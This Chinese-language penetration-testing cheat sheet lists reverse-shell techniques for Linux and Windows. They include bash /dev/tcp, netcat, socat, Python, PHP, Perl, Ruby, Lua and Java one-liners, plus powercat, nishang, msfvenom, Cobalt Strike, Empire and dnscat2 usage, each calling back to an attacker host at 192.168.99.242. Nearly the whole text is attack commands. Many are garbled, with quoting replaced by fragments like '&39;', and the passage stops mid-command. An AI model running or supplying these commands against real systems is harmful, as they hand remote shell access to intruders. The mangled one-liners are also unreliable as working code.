在渗透过程中，往往因为端口限制而无法直连目标机器，此时需要通过反弹shell来获取一个交互式shell，以便继续深入。

反弹shell是打开内网通道的第一步，也是权限提升过程中至关重要的一步。本文所有姿势整理自网络，并基于同一个假设的前提下完成测试和验证。（假设：攻击者主机为：192.168.99.242，本地监听1234端口，如有特殊情况以下会备注说明。）

Linux 反弹shell

姿势一：bash反弹

bash -i >& /dev/tcp/192.168.99.242/1234 0>&1

base64版：bash -c &39;

在线编码地址：http://www.jackson-t.ca/runtime-exec-payloads.html

其他版本：

exec 5<>/dev/tcp/192.168.99.242/1234;cat <&5 | while read line; do $line 2>&5 >&5;done

exec /bin/sh 0&0 2>&0

姿势二：nc反弹

nc -e /bin/bash 192.168.99.242 1234

姿势三：awk反弹

awk &34;/inet/tcp/0/192.168.99.242/1234&39;

姿势四：telnet反弹

备注：需要在攻击主机上分别监听1234和4321端口，执行反弹shell命令后，在1234终端输入命令，4321查看命令执行后的结果。

telnet 192.168.99.242 1234 | /bin/bash | telnet 192.168.99.242 4321

姿势五：socat反弹

socat exec:&39;,pty,stderr,setsid,sigint,sane tcp:192.168.99.242:1234

姿势六：Python反弹

python -c &39;192.168.99.242&39;/bin/bash&39;-i&34;

姿势七：PHP反弹

php -r &34;192.168.99.242&34;/bin/sh -i <&3 >&3 2>&3&39;

姿势八：Perl反弹

perl -e &34;192.168.99.242&34;tcp&34;>&S&34;>&S&34;>&S&34;/bin/sh -i&39;

姿势九：Ruby反弹

ruby -rsocket -e&34;192.168.99.242&34;/bin/sh -i <&%d >&%d 2>&%d&39;

姿势十：Lua反弹

lua -e &39;socket&39;os&39;192.168.99.242&39;1234&39;/bin/sh -i <&3 >&3 2>&3&34;

姿势十一：JAVA反弹

public class Revs {

/**

* @param args

* @throws Exception

*/

public static void main(String[] args) throws Exception {

// TODO Auto-generated method stub

Runtime r = Runtime.getRuntime();

String cmd[]= {&34;,&34;,&34;};

Process p = r.exec(cmd);

p.waitFor();

}

}

保存为Revs.java文件，编译执行，成功反弹shell。

javac Revs.java

java Revs

Windows反弹shell

姿势一：nc反弹

netcat 下载：https://eternallybored.org/misc/netcat/

服务端反弹：nc 192.168.99.242 1234 -e c:\windows\system32\cmd.exe

姿势二：powershell反弹

powercat是netcat的powershell版本，功能免杀性都要比netcat好用的多。

PS C:\WWW>powershell IEX (New-Object System.Net.Webclient).DownloadString(&39;); powercat -c 192.168.99.242 -p 1234 -e cmd

下载到目标机器本地执行：

PS C:\WWW> Import-Module ./powercat.ps1

PS C:\WWW> powercat -c 192.168.99.242 -p 1234 -e cmd

姿势三：MSF反弹shell

使用msfvenom生成相关Payload

msfvenom -l payloads | grep &39;

msfvenom -p cmd/windows/reverse_powershell LHOST=192.168.99.242 LPORT=1234

姿势四：Cobalt strike反弹shell

1、配置监听器：点击Cobalt Strike——>Listeners——>在下方Tab菜单Listeners，点击add。

2、生成payload：点击Attacks——>Packages——>Windows Executable，保存文件位置。

3、目标机执行powershell payload

姿势五：Empire反弹shell

usestager windows/launcher_vbs

info

set Listener test

execute

姿势六：nishang反弹shell

Reverse TCP shell：

powershell IEX (New-Object Net.WebClient).DownloadString(&39;); Invoke-PowerShellTcp -Reverse -IPAddress 10.1.1.210 -port 1234

Reverse UDP shell：

powershell IEX (New-Object Net.WebClient).DownloadString(&39;);

Invoke-PowerShellUdp -Reverse -IPAddress 10.1.1.210 -port 1234

姿势七：Dnscat反弹shell

github项目地址：

https://github.com/iagox86/dnscat2

服务端：

ruby dnscat2.rb --dns &34; --no-cache -e open -e open

目标主机：

powershell IEX (New-Object System.Net